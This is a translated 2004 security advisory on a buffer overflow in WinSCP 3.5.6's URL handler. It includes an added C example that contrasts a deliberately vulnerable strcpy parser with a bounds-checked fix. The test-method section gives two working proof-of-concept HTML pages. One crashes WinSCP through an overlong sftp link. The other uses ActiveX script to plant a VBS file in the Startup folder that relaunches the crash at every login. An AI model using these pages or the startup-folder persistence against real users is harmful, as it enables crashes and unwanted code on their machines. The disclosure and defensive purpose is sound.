WinSCP Overlong URL Handling Memory Corruption Vulnerability

Published: 2004-04-16
Updated: 2004-04-22

Affected systems:
Martin Prikryl WinSCP 3.5.6
Description:
BUGTRAQ ID: 10160

WinSCP is an open-source SFTP and SCP client that runs over SSH.

WinSCP lacks sufficient bounds checking when it handles 'sftp:' or 'scp:' addresses that contain overlong strings. A remote attacker can exploit this by constructing a malicious link and luring WinSCP into processing it, which triggers a buffer overflow.

By default WinSCP registers itself as the handler for sftp:// and scp:// addresses. Because the application does not properly check the bounds of the buffer that receives an overlong URL, a malformed address embedded in an HTML page that a user is lured into visiting can crash the program; with carefully constructed link data it may be possible to execute arbitrary instructions on the system with the privileges of the process.
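
As an added illustration that is not part of this advisory or of WinSCP's source, the following C program contrasts the defect class described above with its fix. It models a hypothetical protocol-handler argument parser (struct session, HOST_BUF, and all function names are assumptions) that copies the host part of an sftp:// or scp:// URL into a fixed 64-byte buffer. The unchecked version copies with strcpy, which is the pattern that lets an overlong URL overwrite memory past the buffer; the checked version measures the host with strcspn first and refuses anything that would not fit, including a constructed URL of 500 'A's shaped like the advisory's test case.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example, not WinSCP's own code. A hypothetical URL-handler argument
 * parser in the style of the defect the advisory describes: the sftp:// or
 * scp:// URL handed to the program by the browser's protocol handler is
 * copied into a fixed-size buffer. HOST_BUF and struct session are assumptions. */
#define HOST_BUF 64

struct session {
    char host[HOST_BUF];
    int port;
};

/* Return a pointer past a recognised scheme, or NULL if the scheme is not
 * one the handler is registered for. */
static const char *strip_scheme(const char *url)
{
    if (strncmp(url, "sftp://", 7) == 0) return url + 7;
    if (strncmp(url, "scp://", 6) == 0) return url + 6;
    return NULL;
}

/* "Before": the vulnerable pattern. strcpy() knows nothing about the size of
 * s->host, so a host longer than HOST_BUF - 1 bytes overwrites whatever
 * follows the buffer (the port field, then the caller's stack). Kept only to
 * make the missing check visible; main() never feeds it an overlong URL. */
int parse_url_unchecked(struct session *s, const char *url)
{
    const char *p = strip_scheme(url);
    if (p == NULL) return -1;
    strcpy(s->host, p);            /* no bounds check */
    s->port = 22;
    return 0;
}

/* "After": the same parser with the length measured before the copy.
 * Return codes: 0 ok, -1 unknown scheme, -2 empty or overlong host, -3 bad port. */
int parse_url_checked(struct session *s, const char *url)
{
    const char *p = strip_scheme(url);
    size_t n;
    if (p == NULL) return -1;
    n = strcspn(p, ":/");          /* host ends at a port or path separator */
    if (n == 0 || n >= HOST_BUF) return -2;   /* would not fit with its NUL */
    memcpy(s->host, p, n);
    s->host[n] = '\0';
    s->port = 22;
    if (p[n] == ':') {
        char *end;
        long port = strtol(p + n + 1, &end, 10);
        if (end == p + n + 1 || port < 1 || port > 65535) return -3;
        s->port = (int)port;
    }
    return 0;
}

/* Helpers that return plain values so the checked parser's verdict can be
 * inspected without handling the struct directly. */
int checked_rc(const char *url)
{
    struct session s;
    return parse_url_checked(&s, url);
}

int checked_port(const char *url)
{
    struct session s;
    return parse_url_checked(&s, url) == 0 ? s.port : -1;
}

int checked_host_is(const char *url, const char *expected)
{
    struct session s;
    return parse_url_checked(&s, url) == 0 && strcmp(s.host, expected) == 0;
}

/* Build a constructed "scp://AAA...A" URL with host_len 'A's, the shape of the
 * advisory's test input, and report what the checked parser says about it. */
int checked_rc_for_overlong(size_t host_len)
{
    char *url = malloc(6 + host_len + 1);
    int rc;
    if (url == NULL) return -99;
    memcpy(url, "scp://", 6);
    memset(url + 6, 'A', host_len);
    url[6 + host_len] = '\0';
    rc = checked_rc(url);
    free(url);
    return rc;
}

int main(void)
{
    struct session s;
    /* Benign input: both parsers agree. */
    parse_url_unchecked(&s, "sftp://example.test");
    printf("unchecked: host=%s port=%d\n", s.host, s.port);
    printf("checked:   rc=%d\n", parse_url_checked(&s, "scp://example.test:2222/backup"));
    printf("           host=%s port=%d\n", s.host, s.port);
    /* Input shaped like the advisory's test case: about 500 'A's. The checked
     * parser refuses it instead of copying it into a 64-byte buffer. */
    printf("overlong:  rc=%d\n", checked_rc_for_overlong(500));
    return 0;
}
```

Compile with any C compiler and run; the checked parser returns -2 for the overlong input rather than writing past the buffer. The design point is that the amount copied is decided by the destination's capacity, never by the length of the source string, and that rejecting an oversized URL is a perfectly acceptable outcome for a handler that any web page can invoke without the user typing anything.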

<*Source: Luca Ercoli (luca.ercoli@inwind.it)
  
  Link: http://www.securiteam.com/windowsntfocus/5OP0A1FCLE.html
*>

Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching only. Users bear the risk themselves!

Luca Ercoli (luca.ercoli@inwind.it) provided the following test method:

------ WinSCP_DoS1.html --------

<HTML>
<HEAD>
<TITLE>WinSCP DoS</TITLE>

<meta http-equiv="Refresh" content="0; URL=sftp://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">

</HEAD>
<BODY>
</BODY>
</HTML>

-------- WinSCP_DoS2.html -------

<html>
  <head>
   <title>WinSCP DoS</title>

<script language="JScript">

     var WshShell = new ActiveXObject("WScript.Shell");
     strSU = WshShell.SpecialFolders("StartUp");

     var fso = new ActiveXObject("Scripting.FileSystemObject");
     var vibas = fso.CreateTextFile(strSU + "\\WinSCPDoS.vbs",true);

     vibas.WriteLine("Dim shell");
     vibas.WriteLine("Dim quote");
     vibas.WriteLine("Dim DoS");
     vibas.WriteLine("Dim param");
     vibas.WriteLine("DoS = \"C:\\Programmi\\WinSCP3\\WinSCP3.exe\"");
     vibas.WriteLine("param = \"scp://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"");
     vibas.WriteLine("set shell = WScript.CreateObject(\"WScript.Shell\")");
     vibas.WriteLine("quote = Chr(34)");
     vibas.WriteLine("pgm = \"explorer\"");
     vibas.WriteLine("shell.Run quote & DoS & quote & \" \" & param");

     vibas.Close();

    </script>

  </head>
</html>

Recommendations:
Vendor patch:

Martin Prikryl
--------------
The vendor has not yet released a patch or upgrade. We recommend that users of this software monitor the vendor's home page for the latest version:

http://winscp.sourceforge.net/

This vulnerability notice was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.